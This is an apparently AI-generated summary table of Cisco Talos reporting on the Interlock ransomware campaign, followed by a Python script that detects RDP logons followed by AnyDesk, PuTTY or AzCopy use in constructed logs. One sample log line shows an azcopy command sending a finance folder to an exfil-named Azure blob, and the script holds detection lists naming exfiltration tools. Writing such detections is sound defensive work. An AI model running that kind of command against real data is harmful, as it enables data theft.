| Category | Details |
|---|---|
| Threat Actors | Interlock ransomware group; possibly emerged from Rhysida ransomware operators |
| Campaign Overview | Big-game hunting and double-extortion attacks using Interlock ransomware; the attacker used multiple tools and techniques to gain access and exfiltrate data before deploying the ransomware |
| Target Sectors and Regions | Healthcare, technology and government (U.S.); manufacturing (Europe) |
| Methodology | Initial access via a fake browser updater that delivered a RAT; RDP, AnyDesk and PuTTY for lateral movement; Azure Storage Explorer and AzCopy for data exfiltration |
| Platforms Targeted | Windows and Linux hosts, with sensitive data and files targeted for exfiltration and encryption |
| Malware Reference | Interlock ransomware (Windows EXE and Linux ELF variants) |
| Tools Used | Fake browser updater (RAT), PowerShell scripts, credential stealer (cht.exe), keylogger (klg.dll), Remote Desktop Protocol (RDP), AnyDesk, PuTTY, Azure Storage Explorer, AzCopy |
| Vulnerabilities Exploited | Unpatched vulnerabilities in infrastructure (no specific CVE is named in this summary); a fake browser update delivered via compromised legitimate URLs |
| TTPs (Tactics, Techniques, Procedures) | Initial access via fake browser updater; keylogging; credential theft; lateral movement over RDP/AnyDesk/PuTTY; data exfiltration with Azure Storage Explorer and AzCopy; deployment of the ransomware encryptor; file encryption with specific exclusions |
| Attribution | Likely Rhysida ransomware operators or developers, based on similarities in tactics and in the ransomware encryptor |
| Recommendations | Patch infrastructure vulnerabilities, enforce multi-factor authentication, monitor RDP usage, and control and monitor data exfiltration paths (including cloud storage transfer tools) |
| Source | Cisco Talos Blog |
Read full article: https://blog.talosintelligence.com/emerging-interlock-ransomware/
The above summary has been generated by an AI language model
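The tool chain in the table (RDP logon, then AnyDesk/PuTTY, then AzCopy or Azure Storage Explorer pushing data to cloud storage) is easy to watch for in endpoint telemetry. The script below is an added example, not code from the Talos report or from the Interlock operators: it runs a few detection rules over constructed Windows Security (4624) and Sysmon-style (event 1, process creation) lines and correlates an RDP logon with a later cloud-transfer tool launch on the same host. The log format, host names, user names, storage account URL and the image names `anydesk.exe`, `putty.exe`, `azcopy.exe` and `storageexplorer.exe` are assumptions for the example.

```python
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real data): ISO timestamp, then key=value pairs.
# event=4624 logon_type=10 is a Windows RDP (RemoteInteractive) logon;
# event=1 mimics a Sysmon process-creation record.
SAMPLE_LOG = r"""
2024-10-10T02:14:05Z host=FS01 event=4624 logon_type=10 user=CORP\jdoe src_ip=10.0.5.23
2024-10-10T02:16:30Z host=FS01 event=1 user=CORP\jdoe image="C:\Users\jdoe\Downloads\AnyDesk.exe" cmd="AnyDesk.exe --silent"
2024-10-10T02:20:41Z host=FS01 event=1 user=CORP\jdoe image="C:\Tools\azcopy.exe" cmd="azcopy copy D:\Finance https://exfilstor.blob.core.windows.net/out --recursive"
2024-10-10T02:21:00Z host=WS22 event=4624 logon_type=2 user=CORP\alice src_ip=-
2024-10-10T09:05:12Z host=WS22 event=1 user=CORP\alice image="C:\Windows\System32\notepad.exe" cmd="notepad.exe"
2024-10-10T09:10:00Z host=WS09 event=1 user=CORP\bob image="C:\Program Files\PuTTY\putty.exe" cmd="putty.exe"
"""

# Image names are assumed for the example; adjust to what your EDR records.
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "putty.exe"}
EXFIL_TOOLS = {"azcopy.exe", "storageexplorer.exe"}
AZURE_BLOB_SUFFIX = "blob.core.windows.net"
RDP_WINDOW = timedelta(hours=1)  # how long after an RDP logon a tool launch is correlated

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Split one log line into a dict; quoted values may contain spaces."""
    ts_str, _, rest = line.partition(" ")
    ev = {"ts": datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")}
    for key, quoted, bare in KV_RE.findall(rest):
        ev[key] = quoted if quoted else bare
    return ev


def alert(rule, ev, detail):
    return {"rule": rule, "host": ev.get("host", "?"), "ts": ev["ts"],
            "user": ev.get("user", "?"), "detail": detail}


def detect(lines):
    """Run the rules in time order and return the alerts raised."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    alerts = []
    rdp_logons = {}  # host -> timestamps of RDP logons seen so far
    for ev in events:
        host = ev.get("host", "?")
        # Rule 1: interactive RDP logon (the lateral-movement channel named in the summary).
        if ev.get("event") == "4624" and ev.get("logon_type") == "10":
            rdp_logons.setdefault(host, []).append(ev["ts"])
            alerts.append(alert("rdp_logon", ev,
                                f"RDP logon by {ev.get('user')} from {ev.get('src_ip')}"))
            continue
        if ev.get("event") != "1":
            continue
        image = PureWindowsPath(ev.get("image", "")).name.lower()
        cmd = ev.get("cmd", "")
        # Rule 2: remote-access tooling launched on an endpoint.
        if image in REMOTE_ACCESS_TOOLS:
            alerts.append(alert("remote_access_tool", ev, image))
        # Rule 3: cloud-transfer tooling; escalate when the command line targets Azure Blob.
        elif image in EXFIL_TOOLS:
            rule = "azcopy_to_azure_blob" if AZURE_BLOB_SUFFIX in cmd.lower() else "exfil_tool"
            alerts.append(alert(rule, ev, cmd))
            # Rule 4: correlate with a recent RDP logon on the same host.
            recent = [t for t in rdp_logons.get(host, [])
                      if timedelta(0) <= ev["ts"] - t <= RDP_WINDOW]
            if recent:
                alerts.append(alert("rdp_then_exfil", ev,
                                    f"{image} launched {ev['ts'] - recent[-1]} after RDP logon"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.strip().splitlines()):
        print(f"{a['ts']:%H:%M:%S} {a['host']:<5} {a['rule']:<22} {a['detail']}")
```

On the sample data the script raises five alerts: the RDP logon, AnyDesk and AzCopy on FS01 (with the AzCopy launch correlated to the logon six minutes earlier), and PuTTY on WS09; the console logon on WS22 and notepad are ignored. In production the same rules would sit in a SIEM query rather than a script, but the correlation step is the part worth copying: a cloud-transfer tool on its own is noisy on hosts where backup or cloud operations are routine, whereas one appearing shortly after an RDP logon from an unusual source is the pattern the summary describes.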